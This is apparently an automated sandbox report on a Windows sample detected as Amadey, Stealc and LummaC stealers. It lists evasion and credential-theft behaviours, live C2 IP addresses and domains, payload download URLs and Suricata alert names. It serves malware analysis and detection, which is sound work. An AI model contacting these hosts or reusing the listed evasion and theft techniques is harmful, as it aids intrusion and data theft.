Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1571971
MD5: f5db9dcea4098275cb46b5d6fe73cef8
SHA1: 9b623e4cfff93bffbaf7034ebbf893773700ba94
SHA256: 34959918550ef8a11fe8e0ef9dde5f85f0dac541e62a2cad53998d4a0eb07d9d
Tags: Amadey, exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.16/off/random.exeb Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php95dA Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/a Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpa4 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe_ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: ae5cfd188c.exe.3512.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "print-vexer.biz", "zinc-sneark.biz", "se-blurry.biz", "atten-supporse.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "formy-spill.biz"], "Build id": "LOGS11--LiveTraffic"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Source: file.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_006DDBBE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E68EE FindFirstFileW,FindClose, 11_2_006E68EE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_006E698F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD076
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD3A9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E9642
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E979D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_006E9B2B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_006E5C97
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 191MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:57488 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49787 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49800 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49814 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49807 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49821 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49833 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49842 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49852 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49864 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49870 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49835 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49874 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49897 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49906 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49880 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49897 -> 104.21.48.1:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:09 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Mon, 09 Dec 2024 21:09:04 GMTConnection: keep-aliveETag: "67575c70-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 a6 e5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 6a 61 70 71 73 68 00 70 1a 00 00 60 30 00 00 6c 1a 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 66 6a 6e 73 65 6e 6f 65 00 10 00 00 00 d0 4a 00 00 04 00 00 00 c6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:18 GMTContent-Type: application/octet-streamContent-Length: 1799168Last-Modified: Mon, 09 Dec 2024 21:09:11 GMTConnection: keep-aliveETag: "67575c77-1b7400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 8b d7 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 6e 71 7a 67 6b 67 00 d0 19 00 00 60 4f 00 00 d0 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 71 75 71 6f 76 6c 68 00 10 00 00 00 30 69 00 00 04 00 00 00 4e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 69 00 00 22 00 00 00 52 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
